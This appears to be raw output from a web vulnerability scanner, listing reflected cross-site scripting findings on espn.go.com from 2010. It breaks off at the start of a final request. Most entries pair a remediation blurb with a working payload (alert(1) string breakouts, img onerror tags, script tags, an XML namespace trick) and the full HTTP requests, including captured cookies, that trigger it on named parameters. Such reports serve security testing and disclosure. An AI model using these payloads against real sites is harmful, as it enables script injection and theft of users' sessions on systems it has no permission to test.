The value of the adminOver request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0933"%3balert(1)//f1709e21753 was submitted in the adminOver parameter. This input was echoed as a0933";alert(1)//f1709e21753 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:21:59 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:21:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN14
Cache-Expires: Sat, 06 Nov 2010 14:30:19 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 1371
The value of the autostart request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59854"%3balert(1)//cc78248a523 was submitted in the autostart parameter. This input was echoed as 59854";alert(1)//cc78248a523 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:23:20 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:23:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN10
Cache-Expires: Sat, 06 Nov 2010 14:31:40 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 1371
The value of the player request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb4ee"%3balert(1)//e664ff0054e was submitted in the player parameter. This input was echoed as fb4ee";alert(1)//e664ff0054e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:20:43 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:20:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 14:29:03 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 1399
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42000"><img%20src%3da%20onerror%3dalert(1)>f1469c47fb3 was submitted in the REST URL parameter 5. This input was echoed as 42000"><img src=a onerror=alert(1)>f1469c47fb3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /espn3/index/_/sport/basketball42000"><img%20src%3da%20onerror%3dalert(1)>f1469c47fb3 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sun, 07 Nov 2010 06:23:25 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sun, 07 Nov 2010 06:23:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Sun, 07 Nov 2010 06:31:45 GMT
Content-Length: 772619
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]... <meta name="description" CONTENT="Enjoy live streaming Basketball42000"><img src=a onerror=alert(1)>f1469c47fb3 online on ESPN3.com. Never miss a game!" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75580'%3b056a2319ce8 was submitted in the REST URL parameter 5. This input was echoed as 75580';056a2319ce8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /espn3/index/_/sport/basketball75580'%3b056a2319ce8 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sun, 07 Nov 2010 06:23:50 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sun, 07 Nov 2010 06:23:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sun, 07 Nov 2010 06:32:10 GMT
Content-Length: 772479
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]... <script type="text/javascript"> anTrackESPN3(0,'espn3',ud.name,'','','index','index',ud.name,'','en','basketball75580';056a2319ce8','');
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a7a3"><img%20src%3da%20onerror%3dalert(1)>00551600c81 was submitted in the REST URL parameter 5. This input was echoed as 8a7a3"><img src=a onerror=alert(1)>00551600c81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /espn3/index/_/sport/football8a7a3"><img%20src%3da%20onerror%3dalert(1)>00551600c81 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009663813; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009661845; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 03:39:30 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 03:39:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN01
Cache-Expires: Sat, 06 Nov 2010 03:47:49 GMT
Content-Length: 788700
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]... <meta name="description" CONTENT="Enjoy live streaming Football8a7a3"><img src=a onerror=alert(1)>00551600c81 online on ESPN3.com. Never miss a game!" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73637'%3ba4928c70f34 was submitted in the REST URL parameter 5. This input was echoed as 73637';a4928c70f34 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /espn3/index/_/sport/football73637'%3ba4928c70f34 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009663813; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009661845; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 03:39:28 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 03:39:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN12
Cache-Expires: Sat, 06 Nov 2010 03:47:48 GMT
Content-Length: 788560
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]... <script type="text/javascript"> anTrackESPN3(0,'espn3',ud.name,'','','index','index',ud.name,'','en','football73637';a4928c70f34','');
The value of the pageType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae11a"%3balert(1)//70dba98dd9 was submitted in the pageType parameter. This input was echoed as ae11a";alert(1)//70dba98dd9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the adminOver request parameter is copied into the XML document as plain text between tags. The payload 89c9d<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>99ff36eea82 was submitted in the adminOver parameter. This input was echoed as 89c9d<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>99ff36eea82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:17:38 GMT
Content-Type: text/xml;charset=UTF-8
Last-Modified: Sat, 06 Nov 2010 14:17:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN20
Cache-Expires: Sat, 06 Nov 2010 14:25:58 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 6403
The value of the height request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f548a'%3balert(1)//361c204b438 was submitted in the height parameter. This input was echoed as f548a';alert(1)//361c204b438 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=f548a'%3balert(1)//361c204b438&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:19:24 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:19:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN35
Cache-Expires: Sat, 06 Nov 2010 14:27:44 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 2858
The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50a75'%3balert(1)//eef911a8eef was submitted in the id parameter. This input was echoed as 50a75';alert(1)//eef911a8eef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=565489750a75'%3balert(1)//eef911a8eef&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:17:41 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:17:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN06
Cache-Expires: Sat, 06 Nov 2010 14:26:01 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 2620
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b19d"><script>alert(1)</script>5126c3ab88e was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videohub/mpf/frame/playerEmbed?id=56548979b19d"><script>alert(1)</script>5126c3ab88e&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:17:56 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:17:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN10
Cache-Expires: Sat, 06 Nov 2010 14:26:13 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 2710
The value of the omniPageName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6c58"%3balert(1)//be026dd05fd was submitted in the omniPageName parameter. This input was echoed as a6c58";alert(1)//be026dd05fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
